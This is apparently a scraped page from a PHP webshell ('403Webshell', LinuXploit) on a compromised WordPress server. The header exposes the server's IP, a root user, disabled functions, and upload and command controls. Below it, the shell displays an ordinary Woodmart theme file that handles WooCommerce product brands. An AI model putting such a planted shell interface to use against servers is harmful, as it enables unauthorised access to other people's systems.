403Webshell
Server IP : 38.190.208.107  /  Your IP : 216.73.217.38
Web Server : nginx/1.28.1
System : Linux ht2026040333114 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64
User : root ( 0)
PHP Version : 8.2.28
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv,eval,assert,passthru,system,exec,shell_exec,popen,proc_open
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/wp.4/wp-content/themes/woodmart/inc/integrations/woocommerce/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/wp.4/wp-content/themes/woodmart/inc/integrations/woocommerce/modules/brands.php
<?php
/**
 * Woodmart Brands functions
 *
 * @package woodmart
 */

use XTS\Modules\Layouts\Global_Data as Builder_Data;
use XTS\Modules\Layouts\Main;

if ( ! defined( 'WOODMART_THEME_DIR' ) ) {
	exit( 'No direct script access allowed' );
}

if ( ! function_exists( 'woodmart_product_brand' ) ) {
	/**
	 * Show product brand.
	 *
	 * @param array $args Arguments.
	 * @return void
	 */
	function woodmart_product_brand( $args = array() ) {
		global $product;

		$attr = woodmart_get_opt( 'brands_attribute' );

		if ( ! $product || ( ! $attr && ! taxonomy_exists( 'product_brand' ) ) || ( ! woodmart_get_opt( 'product_page_brand' ) && ( woodmart_loop_prop( 'is_quick_view' ) || ! Main::get_instance()->has_custom_layout( 'single_product' ) ) ) ) {
			return;
		}

		if ( $attr ) {
			$attributes = $product->get_attributes();

			if ( empty( $attributes[ $attr ] ) ) {
				return;
			}
		} else {
			$attr = 'product_brand';
		}

		$brands   = wc_get_product_terms( $product->get_id(), $attr, array( 'fields' => 'all' ) );
		$taxonomy = get_taxonomy( $attr );

		if ( empty( $brands ) ) {
			return;
		}

		$builder_label = Builder_Data::get_instance()->get_data( 'builder_label' );

		if ( woodmart_is_shop_on_front() ) {
			$link = home_url();
		} else {
			$link = get_post_type_archive_link( 'product' );
		}

		$wrapper_attrs = '';

		$classes = 'sidebar' === woodmart_get_opt( 'product_brand_location' ) && ! woodmart_loop_prop( 'is_quick_view' ) ? ' wd-widget widget sidebar-widget' : '';

		if ( ! empty( $args['classes'] ) ) {
			$classes .= $args['classes'];
		}

		if ( ! empty( $args['element_id'] ) ) {
			$wrapper_attrs .= ' id="' . esc_attr( $args['element_id'] ) . '"';
		}

		echo '<div class="wd-product-brands' . esc_attr( $classes ) . '"' . wp_kses( $wrapper_attrs, true ) . '>';

		if ( isset( $args['content'] ) ) {
			echo wp_kses( $args['content'], true );
		}

		if ( ! empty( $builder_label ) ) {
			echo '<span class="wd-label">' . esc_html( $builder_label ) . '</span>';
		}

		foreach ( $brands as $brand ) {
			$image = get_term_meta( $brand->term_id, 'image', true );
			$attrs = '';

			if ( get_term_meta( $brand->term_id, 'image_id', true ) ) {
				$data  = wp_get_attachment_image_src( get_term_meta( $brand->term_id, 'image_id', true ) );
				$attrs = ' width="' . $data['1'] . '" height="' . $data['2'] . '"';
			}

			if ( ! $image ) {
				$thumbnail_id = get_term_meta( $brand->term_id, 'thumbnail_id', true );

				if ( $thumbnail_id ) {
					$image = array(
						'id' => $thumbnail_id,
					);
				}
			}

			if ( is_object( $taxonomy ) && $taxonomy->public ) {
				$attr_link = get_term_link( $brand->term_id, $brand->taxonomy );
			} else {
				$attr_link = add_query_arg(
					'filter_' . sanitize_title( str_replace( 'pa_', '', $attr ) ),
					$brand->slug,
					$link
				);
			}

			$content = esc_attr( $brand->name );

			if ( is_array( $image ) && ! empty( $image['id'] ) ) {
				$content = wp_get_attachment_image(
					$image['id'],
					'full',
					false,
					array(
						'title' => $brand->name,
						'alt'   => $brand->name,
					)
				);
			} elseif ( ! is_array( $image ) && $image ) {
				$content = apply_filters( 'woodmart_image', '<img src="' . esc_url( $image ) . '" title="' . esc_attr( $brand->name ) . '" alt="' . esc_attr( $brand->name ) . '" ' . $attrs . '>' );
			}

			?>
			<a href="<?php echo esc_url( $attr_link ); ?>">
				<?php echo wp_kses( $content, true ); ?>
			</a>
			<?php
		}

		echo '</div>';
	}
}

if ( ! function_exists( 'woodmart_product_brands_links' ) ) {
	/**
	 * Show product brand on product loop.
	 *
	 * @param string $classes Additional classes.
	 * @param bool   $is_element Is called from the element.
	 * @param string $content Additional content.
	 *
	 * @return void
	 */
	function woodmart_product_brands_links( $classes = '', $is_element = false, $content = '' ) {
		global $product;

		if ( ! woodmart_get_opt( 'brands_under_title' ) && ! $is_element ) {
			return;
		}

		$brand_option = woodmart_get_opt( 'brands_attribute' ) ? woodmart_get_opt( 'brands_attribute' ) : 'product_brand';
		$brands       = wc_get_product_terms( $product->get_id(), $brand_option, array( 'fields' => 'all' ) );
		$taxonomy     = get_taxonomy( $brand_option );

		if ( 'variation' === $product->get_type() && empty( $brands ) && $product->get_parent_id() ) {
			// For variable products, get the parent product's brands.
			$brands = wc_get_product_terms( $product->get_parent_id(), $brand_option, array( 'fields' => 'all' ) );
		}

		if ( empty( $brands ) ) {
			return;
		}

		$link = ( woodmart_is_shop_on_front() ) ? home_url() : get_post_type_archive_link( 'product' );

		echo '<div class="wd-product-brands-links' . esc_attr( $classes ) . '">';

		if ( $content ) {
			echo wp_kses( $content, true );
		}

		foreach ( $brands as $brand ) {
			if ( is_object( $taxonomy ) && $taxonomy->public ) {
				$attr_link = get_term_link( $brand->term_id, $brand->taxonomy );
			} else {
				$attr_link = add_query_arg( 'filter_' . sanitize_title( str_replace( 'pa_', '', $brand_option ) ), $brand->slug, $link );
			}

			$sep = '<span class="wd-meta-sep">,</span> ';
			if ( end( $brands ) === $brand ) {
				$sep = '';
			}

			echo '<a href="' . esc_url( $attr_link ) . '">' . wp_kses( $brand->name, true ) . '</a>' . wp_kses( $sep, true );
		}

		echo '</div>';
	}
}

if ( ! function_exists( 'woodmart_product_brand_tab' ) ) {
	/**
	 * Show product brand tab to the single product page
	 *
	 * @param array $tabs Tabs.
	 * @return array
	 */
	function woodmart_product_brand_tab( $tabs ) {
		global $product;

		$attr = woodmart_get_opt( 'brands_attribute' ) ? woodmart_get_opt( 'brands_attribute' ) : 'product_brand';

		$brand_info = wc_get_product_terms( $product->get_id(), $attr, array( 'fields' => 'all' ) );

		$priority = woodmart_get_opt( 'brand_tab_priority' );
		$priority = ! empty( $priority ) && is_numeric( $priority ) ? $priority : 50;

		if ( isset( $brand_info[0] ) && $brand_info[0]->description ) {
			$tabs['brand_tab'] = array(
				/* translators: %s: brand name */
				'title'    => woodmart_get_opt( 'brand_tab_name' ) ? sprintf( esc_html__( 'About %s', 'woodmart' ), $brand_info[0]->name ) : esc_html__( 'About brand', 'woodmart' ),
				'priority' => $priority,
				'callback' => 'woodmart_product_brand_tab_content',
			);
		}

		return $tabs;
	}
}

if ( ! function_exists( 'woodmart_product_brand_tab_content' ) ) {
	/**
	 * Product brand tab content.
	 *
	 * @return void
	 */
	function woodmart_product_brand_tab_content() {
		global $product;

		$attr = 'product_brand';

		if ( woodmart_get_opt( 'brands_attribute' ) ) {
			$attr = woodmart_get_opt( 'brands_attribute' );

			$attributes = $product->get_attributes();

			if ( ! isset( $attributes[ $attr ] ) || empty( $attributes[ $attr ] ) ) {
				return;
			}
		}

		$brands = wc_get_product_terms( $product->get_id(), $attr, array( 'fields' => 'slugs' ) );

		if ( empty( $brands ) ) {
			return;
		}

		foreach ( $brands as $slug ) {
			$brand = get_term_by( 'slug', $slug, $attr );
			echo do_shortcode( $brand->description );
		}
	}
}

if ( ! function_exists( 'woodmart_admin_localized_brand_attribute' ) ) {
	/**
	 * Add brand attribute to the localized string.
	 *
	 * @param array $setting Localized string.
	 * @return mixed
	 */
	function woodmart_admin_localized_brand_attribute( $setting ) {
		if ( woodmart_woocommerce_installed() ) {
			$brand_attribute = woodmart_get_opt( 'brands_attribute' );

			if ( $brand_attribute ) {
				$setting['brand_attribute'] = wc_attribute_taxonomy_id_by_name( $brand_attribute );
			} elseif ( taxonomy_exists( 'product_brand' ) ) {
				$taxonomy = get_taxonomy( 'product_brand' );

				$setting['brand_attribute'] = $taxonomy->name;
			}
		}

		return $setting;
	}

	add_filter( 'woodmart_admin_localized_string_array', 'woodmart_admin_localized_brand_attribute' );
}

if ( ! function_exists( 'woodmart_get_product_brand_list' ) ) {
	/**
	 * Get product brand list.
	 *
	 * @return string
	 */
	function woodmart_get_product_brand_list() {
		global $product;

		$terms_name = woodmart_get_opt( 'brands_attribute' ) ? woodmart_get_opt( 'brands_attribute' ) : 'product_brand';

		$terms       = get_the_terms( $product->get_id(), $terms_name );
		$brand_count = is_array( $terms ) ? count( $terms ) : 0;

		$content = get_the_term_list(
			$product->get_id(),
			$terms_name,
			'<span class="posted_in"><span class="meta-label">' . _n( 'Brand: ', 'Brands: ', $brand_count, 'woodmart' ) . '</span>',
			'<span class="meta-sep">,</span> ',
			'</span>'
		);

		if ( is_wp_error( $content ) ) {
			return '';
		}

		return $content;
	}
}

if ( ! function_exists( 'woodmart_remove_output_default_brands_on_single_page' ) ) {
	/**
	 * Remove output default brands on single page.
	 *
	 * @return void
	 */
	function woodmart_remove_output_default_brands_on_single_page() {
		if ( ! empty( $GLOBALS['WC_Brands'] ) ) {
			remove_action( 'woocommerce_product_meta_end', array( $GLOBALS['WC_Brands'], 'show_brand' ) );
		}
	}

	add_action( 'init', 'woodmart_remove_output_default_brands_on_single_page', 100 );
}

Youez - 2016 - github.com/yon3zu
LinuXploit